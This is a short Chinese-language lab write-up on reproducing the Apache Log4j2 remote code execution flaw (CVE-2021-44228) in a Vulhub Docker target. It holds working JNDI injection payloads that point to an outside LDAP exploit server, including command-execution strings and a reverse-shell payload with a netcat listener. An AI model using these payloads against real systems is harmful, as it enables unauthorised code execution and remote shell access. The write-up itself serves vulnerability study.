Apache Log4j2 RCE (CVE-2021-44228)

简介

Vulhub是一个基于dockerdocker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。

Github地址:https://github.com/vulhub/vulhub

1
2
3
4
5
6
# 下载项目
git clone https://github.com/vulhub/vulhub.git
# 进入靶场目录
cd vulhub/xxx
# 启动靶场
docker-compose up

漏洞环境

靶场:192.168.199.132

1
2
cd vulhub/log4j/CVE-2021-44228/
docker-compose up

访问地址: http://192.168.199.132:8983/

漏洞复现

使用Jndi漏洞利用工具,在公网服务器开启ldap服务,监听11389端口

1
2
# 开启ldap服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 121.4.69.24 -l 11389 -p 18080

命令执行

1
2
3
4
# 命令执行回显,在请求头中添加cmd字段和要执行的命令
cmd:whoami
${jndi:ldap://121.4.69.24:11389/Basic/TomcatEcho}
${jndi:ldap://121.4.69.24:11389/TomcatBypass/TomcatEcho}

反弹shell

1
2
3
# 反弹shell
nc -lvp 8888
${jndi:ldap://121.4.69.24:11389/Basic/ReverseShell/121.4.69.24/18888}